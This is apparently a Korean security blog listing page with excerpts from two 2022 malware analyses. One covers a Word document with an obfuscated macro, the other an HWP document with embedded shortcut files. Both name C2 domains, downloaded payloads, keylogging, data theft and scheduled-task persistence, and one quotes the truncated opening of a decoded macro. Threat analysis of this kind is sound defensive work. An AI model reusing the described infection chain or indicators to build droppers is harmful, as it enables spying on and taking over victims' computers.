728x90 반응형 myartsonline.com2 악성코드가 포함된 워드문서(doc) 분석 2 [분석 요약표] 연번 C2서버 도메인 다운로드 파일1 악성 행위 다운로드 파일2 악성 행위 1 uyfhk.mypressonline.com li.txt 감염 시스템 정보를 C2서버로 전송 li.down 사용자가 키보드로 입력한 값을 Ahanlab.hwp 파일에 저장 2 3 nskal.myarts online.com op.txt op.down xsiel.mypressonline.com에서 추가 악성파일 settings.dat을 다운로드하여 실행 ○ 문서의 매크로 내용을 확인한 결과, 난독화된 소스코드가 확인되며 문서 2개 모두 동일한 매크로가 확인된다. 디코딩하면 아래와 같다. Private Sub Document_Open() Set djfeihfidkasljf = CreateObject("Shell.App.. 2022. 10. 7. lnk 악성코드가 포함된 한글 (hwp) 문서파일 분석 ○ 한글문서를 실행하면 아래 그림과 같은 그림파일의 포스터 4장이 존재한다. 포스터 뒤에는 실행링크(1.lnk, 2.lnk, 3.lnk)가 포함되어 있는 것이 확인된다. ○ 사용자가 문서 내 그림을 클릭하면 링크파일이 실행되며 아래 그림과 같이 ‘bongpenn1.myartsonline.com’ C2서버와 통신하는 것이 확인된다. ‘1.exe’를 이용하여 C2서버의 ‘h.php’ 소스코드를 실행하며 ‘h.php’ 소스코드를 확인한 결과, 작업스케줄러에 'update.ini', 'OndDrive.exe' 파일이 30분마다 자동실행되도록 등록하고 최근 실행파일, 작업스케줄러 목록, 프로그램 목록 등을 C2서버로 전송하는 소스코드를 확인하였다. 한글문서 내에서 악성행위를 하는 OLE 개체를 확인한 결과, 아래.. 2022. 10. 2. 이전 1 다음 728x90 반응형
